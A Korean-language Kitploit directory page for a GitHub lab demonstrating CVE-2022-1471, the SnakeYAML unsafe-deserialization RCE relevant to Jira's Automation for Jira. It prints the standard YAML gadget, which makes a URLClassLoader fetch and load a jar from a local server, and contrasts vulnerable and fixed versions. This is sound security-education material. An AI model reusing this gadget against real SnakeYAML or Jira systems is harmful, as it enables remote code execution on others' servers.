Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/aykhan019/cve-2022-1471-jira-lab
Vulnerability AnalysisExploitationLearning & EducationLabs & Practice
GitHubaykhan019/cve-2022-1471-jira-lab

cve-2022-1471-jira-lab

오프라인 CVE-2022-1471 랩: SnakeYAML의 안전하지 않은 역직렬화를 통한 RCE; 무해한 로컬 페이로드를 사용해 취약한 1.x와 수정된 2.x를 비교합니다.

저장소 보기
5일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-1471 — SnakeYAML RCE 랩 (Jira / Automation for Jira 컨텍스트)

CVE-2022-1471(SnakeYAML 안전하지 않은 역직렬화 → RCE, CVSS 9.8)의 메커니즘을 입증하는 오프라인 자체 포함형 랩으로, Jira / Jira Service Management에서 9.4.9를 실행 중인 호스트를 대상으로 한 발견 사항에 사용된 방식입니다(영향 범위 9.4.0–9.4.12, 9.4.14에서 수정됨 — Atlassian JSDSERVER-14906 참조).

이 랩은 정확히 두 가지를 시연합니다:

  1. SnakeYAML 1.31(Jira 9.4.9가 번들된 Automation for Jira 앱에 포함된 1.x 계열)은 YAML 파싱 중에 표준 가젯을 실행합니다. 코드가 실행되어 마커 파일이 작성됩니다.
  2. SnakeYAML 2.2(9.4.14+ 수정 버전에 포함된 계열)는 동일한 페이로드를 거부합니다(ConstructorException). 아무것도 실행되지 않습니다.

이 랩은 실제 호스트를 악용하지 않습니다. 모든 것은 127.0.0.1에서 실행되며, 페이로드(src/Exploit.java)는 무해합니다. 정적 초기화자가 텍스트 파일 하나를 작성할 뿐 그 외에는 아무것도 하지 않습니다.

실행

root@kitploit:~
./run.sh
cat PWNED-proof.txt   # on-disk proof of execution (regenerated each run)

PATH에 JDK 17+가 필요합니다(javac, java, jar). tools/ 아래에 번들 JDK가 있으면 대신 사용됩니다. 유일한 네트워크 트래픽은 페이로드 jar를 제공하는 127.0.0.1:8077의 로컬 HTTP 서버이며, 종료 시 함께 종료됩니다.

작동 방식

src/VulnDemo.java는 그저 new Yaml().load(yaml)일 뿐입니다. 취약한 Automation for Jira 버전이 가져온 규칙 YAML에 대해 수행하는 것과 동일한 안전하지 않은 호출입니다. 공격자 YAML은 표준 가젯입니다:

root@kitploit:~
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://127.0.0.1:8077/payload.jar"]
  ]]
]

SnakeYAML 1.x는 허용 목록 없이 임의의 클래스를 인스턴스화합니다 → JVM이 "공격자" 서버에서 클래스를 가져와 로드합니다 → 해당 클래스의 정적 초기화자가 실행됩니다. SnakeYAML 2.x는 기본적으로 SafeConstructor를 사용하며, 이는 전역 태그를 거부합니다.

sample-output-PWNED-proof.txt는 실행 결과 마커 파일의 내용을 보여주고, screenshots/는 두 실행(취약 버전 vs 수정 버전)을 보여줍니다.

범위 / 면책 조항

승인된 보안 연구입니다. 라이브러리 메커니즘과 수정 경계에 대한 증명일 뿐이며, 어떤 운영 시스템에 대한 익스플로잇도 아닙니다. Jira 벡터를 악용하려면 추가로 인증된 Jira 관리자의 자동화 규칙 가져오기가 필요합니다.

참고 자료

  • NVD — CVE-2022-1471
  • Atlassian CVE-2022-1471 FAQ
  • Atlassian JSDSERVER-14906
  • SnakeYAML 이슈 #561
도구 다운로드